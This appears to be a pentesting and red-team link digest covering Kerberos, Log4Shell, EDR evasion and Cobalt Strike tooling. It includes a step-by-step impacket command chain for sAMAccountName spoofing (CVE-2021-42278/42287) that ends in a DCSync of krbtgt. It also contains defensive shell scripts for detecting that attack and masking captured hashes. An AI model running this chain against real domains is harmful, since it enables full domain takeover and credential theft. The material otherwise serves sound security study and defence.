Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019
How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.
https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/
#kerberos #windows2019 #pentest
MAL-CL — Malicious Command-Line
MAL-CL aims to collect and document real-world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.
https://github.com/3CORESec/MAL-CL
#windows #cli #detection #blueteam #redteam
Process Ghosting — EDR Evasion
The technique Process Herpaderping attempts evasion by modifying the file (image tampering) from which a process is created on a Windows system. Deleting the file during process creation can have the same result. Even though some endpoint products have matured over the years and are able to detect complex threats, organizations should constantly test the capabilities of their solution and find alternate detection methods even for the same technique.
https://pentestlaboratories.com/2021/12/08/process-ghosting/
#av #evasion #process #redteam #blueteam
ipsourcebypass
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
Example Reports
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the reports from the teams that made it to the finals in the last 2 years (25 reports).
https://github.com/nationalcptc/report_examples
Log4j RCE — CVE-2021-44228
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
ldapconsole
A script for performing custom LDAP queries against a Windows domain and selecting specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with Kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278)
Before the patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with a "$" at the end of the name.
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a computer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
1. Clear its SPNs
addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
2. Rename the computer (computer -> DC)
renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
3. Obtain a TGT
getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
4. Reset the computer name
renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
5. Obtain a service ticket with S4U2self by presenting the previous TGT
KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
6. DCSync by presenting the service ticket
KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
# https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
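As an added example (not from the original post or any of the linked write-ups), a shell function a defender can run over an LDIF export of computer objects to catch the state steps 0 to 2 above leave behind: a computer account without its trailing '$', or a non-DC computer whose name collides with a domain controller's. The LDIF attribute names are standard; the sample export is constructed.

```shell
#!/bin/sh
# Added example: audit an LDIF export of computer objects (as produced by
# ldapsearch) for the precondition of the sAMAccountName trick. Findings:
#   MISSING_DOLLAR     computer account whose sAMAccountName lacks the trailing '$'
#   DC_NAME_COLLISION  non-DC computer whose name (without '$') equals a DC's name
# Assumes one LDIF record per object, separated by blank lines, with unfolded
# lines (use `ldapsearch -o ldif-wrap=no` or unfold the export first).
audit_computer_names() {
  awk 'BEGIN { RS = ""; FS = "\n" }
  {
    dn = ""; sam = ""; uac = 0; is_computer = 0
    for (i = 1; i <= NF; i++) {
      if ($i ~ /^dn: /)                        dn = substr($i, 5)
      else if ($i == "objectClass: computer")  is_computer = 1
      else if ($i ~ /^sAMAccountName: /)       sam = substr($i, 17)
      else if ($i ~ /^userAccountControl: /)   uac = substr($i, 21) + 0
    }
    if (!is_computer || sam == "") next
    n++; dns[n] = dn; sams[n] = sam
    # SERVER_TRUST_ACCOUNT (0x2000) in userAccountControl marks a domain controller
    isdc[n] = (int(uac / 8192) % 2 == 1)
    if (isdc[n]) { s = sam; sub(/\$$/, "", s); dcnames[tolower(s)] = 1 }
  }
  END {
    for (i = 1; i <= n; i++) {
      s = sams[i]
      if (s !~ /\$$/) print "MISSING_DOLLAR " dns[i]
      sub(/\$$/, "", s)
      if (!isdc[i] && (tolower(s) in dcnames)) print "DC_NAME_COLLISION " dns[i]
    }
  }' "$@"
}

# Constructed sample, not a real export: a DC and a workstation renamed to the DC name.
SAMPLE_LDIF='dn: CN=DC01,OU=Domain Controllers,DC=domain,DC=local
objectClass: computer
sAMAccountName: DC01$
userAccountControl: 532480

dn: CN=ControlledComputer,CN=Computers,DC=domain,DC=local
objectClass: computer
sAMAccountName: DC01
userAccountControl: 4096'

printf '%s\n' "$SAMPLE_LDIF" | audit_computer_names
```

Run it on a periodic export and alert on any line; setting ms-DS-MachineAccountQuota to 0 additionally removes the default right that step 0 depends on.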
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows)
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
ADenum
ADenum is a pentesting tool that finds misconfigurations via LDAP and exploits some of those weaknesses with Kerberos.
https://github.com/SecuProject/ADenum
#ad #ldap #kerberos #enumeration #tools
GitLab CI jobs unmasked passwords scanner
https://github.com/Whitespots-OU/gitlab-ci-secrets
#tools #secrets #devsecops
Log4Shell — Quick Guide
https://musana.net/2021/12/13/log4shell-Quick-Guide/
#log4j #waf #bypass #bugbounty
Cobalt-Clip
Cobalt-Clip is a clipboard add-on for Cobalt Strike: it lets you dump, edit and monitor the contents of the clipboard.
https://github.com/DallasFR/Cobalt-Clip
#cobaltstrike #clipboard #dump
Data Masking Bash OneLiner
If you need to mask data from utilities such as Responder\Inveigh for your report, use the following command:
cat hash.txt | awk -F ":" '{print $1"::"$3":"$4":"substr($5,1,4)"***"substr($6,20,20)"***"substr($6,length($6)-8,8)}' | sort -u | sort -u -t : -k 1,1
The following command can be used to mask Hashcat output:
cat hash-hashcat.txt | awk -F ":" '{print ($3"/")$1":"substr($7,1,2)"******"substr($7,length($7)-1,3)}' | sort -u
#report #mask #data #pentest
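As an added example that is not part of the original post, a shell function that generalizes the two one-liners above: it masks Responder/Inveigh NTLMv2 and NTLMv1 capture lines and the cracked-password column of Hashcat output in one pass, and keeps passwords containing ':' intact before masking them. The sample capture lines are constructed.

```shell
#!/bin/sh
# Added example: mask NTLM capture lines before they go into a report.
# Handles three line shapes found in Responder/Inveigh and Hashcat output:
#   NTLMv2:  user::DOMAIN:challenge(16 hex):NTProofStr:blob
#   NTLMv1:  user::DOMAIN:LMresponse:NTresponse:challenge(16 hex)
#   Hashcat: either of the above followed by :cracked_password
# Usernames, domains and the server challenge are kept; responses keep a few
# characters at one edge (as the page's one-liners do) and passwords keep two
# characters at each end. Reads stdin or the files given as arguments.
mask_capture() {
  awk -F ':' '
    function mask(s, head, tail) {
      if (length(s) <= head + tail) return "***"
      return substr(s, 1, head) "***" substr(s, length(s) - tail + 1, tail)
    }
    NF >= 6 {
      if (length($4) == 16) {              # NTLMv2: field 4 is the challenge
        body = $4 ":" mask($5, 4, 0) ":" mask($6, 0, 8)
      } else {                             # NTLMv1: field 6 is the challenge
        body = mask($4, 4, 0) ":" mask($5, 4, 0) ":" $6
      }
      line = $1 "::" $3 ":" body
      if (NF >= 7) {                       # cracked password; may itself contain ":"
        pw = $7
        for (i = 8; i <= NF; i++) pw = pw ":" $i
        line = line ":" mask(pw, 2, 2)
      }
      print line
    }' "$@" | sort -u
}

# Constructed sample (not a real capture): one NTLMv2 line and the same line as cracked by Hashcat.
SAMPLE_CAPTURE='alice::CORP:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000abcdef0123456789
alice::CORP:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000abcdef0123456789:Summer2021!'

printf '%s\n' "$SAMPLE_CAPTURE" | mask_capture
```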